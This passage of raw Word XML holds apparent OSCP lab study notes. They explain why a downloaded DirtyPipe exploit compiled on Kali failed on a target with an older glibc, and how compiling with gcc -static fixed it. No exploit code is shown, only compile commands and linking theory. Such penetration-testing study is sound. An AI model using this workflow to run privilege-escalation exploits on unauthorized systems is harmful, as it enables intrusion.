      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is best explained with an example. In the OSCP-B .149, we had a machine vulnerable to DirtyPipe exploit. So, I downloaded the exploit and ran </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc exploit-1.c -o exploit-1 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on my Kali, and then uploaded it to victim, but then when I ran it on victim I got this error:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1078"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./exploit-1: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found (required by ./exploit-1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035D6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035D7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This tells us that when it looked in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/lib/x86_64-linux-gnu/libc.so.6 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for the dependencies, it had problems since </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GLIBC_2.33 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">was the version of my GLIBC on my Kali (where I compiled the binary) but the GLIBC version of target was only </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GLIBC_2.31</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. So, this causes issues with dependencies. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035D8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035D9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To fix this, we can just pack all the dependencies inside of the exploit-1 executable. We can do this with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-static</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1480"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -static exploit-1.c -o exploit-1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035DB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035DC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This turns exploit-1 from previous a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dynamically linked executable</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (which was small, but needs very specific dependencies) into a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> static executable</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (large but has all the dependencies inside of it)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035DD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035DE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Putting it together (your case):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="462"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On Kali, gcc linked your exploit to glibc 2.33 (in /lib/x86_64-linux-gnu/libc.so.6 on Kali).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="462"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Your binary then recorded “I require GLIBC_2.33 symbols.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="462"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the victim, libc.so.6 was only version 2.31 → missing those symbols → runtime error.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="462"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you added -static, gcc copied the glibc code directly into your binary. No .so loading was needed anymore, so the victim’s older glibc didn’t matter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035E3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035E4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I think this would have worked without static if the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GLIBC of the my Kali was less than or equal to the GLIBC of the victim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035E5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035E6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is it explained in-depth:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035E7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035E8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dynamically linked ELF:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Normally, when you compile with just gcc exploit.c -o exploit, you get a dynamically linked ELF. That means:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1052"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Your binary only contains your code + stubs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1052"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">At runtime, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dynamic linker</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/lib64/ld-linux-x86-64.so.2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) loads in shared libraries (libc.so.6, libm.so.6, etc.) from the victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1052"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The problem: your Kali had glibc 2.33/2.34, so your binary recorded “I need those exact versions.” On the victim, the system libraries were older (say 2.31). When the dynamic linker tried to resolve symbols, it failed with:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1052"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">version `GLIBC_2.33' not found</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035EE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035EF">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you add -static:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="608"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The compiler copies all the needed libc code directly into the binary at build time.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="608"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The result is a self-contained executable: no need to load the victim’s /lib/x86_64-linux-gnu/libc.so.6 at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="608"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That’s why it ran fine — it no longer cared what version of glibc the victim had.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035F3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035F4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Why it fixed your issue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="372"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dynamic binary → depends on victim’s glibc → version mismatch.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="372"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Static binary → bundles its own libc → no mismatch.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035F7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035F8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Downsides of -static</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="699"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bigger binary: static glibc executables can be 1–2+ MB.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="699"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reduced flexibility: if libc has a security update, your binary doesn’t benefit (but for an exploit that’s fine).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="699"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NSS limitations: fully static glibc builds don’t support some name resolution backends (/etc/nsswitch.conf), so gethostbyname() or looking up users/groups in /etc/passwd can behave oddly. Using raw IPs avoids this.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035FC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035FE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yth69kfo7fpl" w:id="484"/>
      <w:bookmarkEnd w:id="484"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Glibc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035FF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003600">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
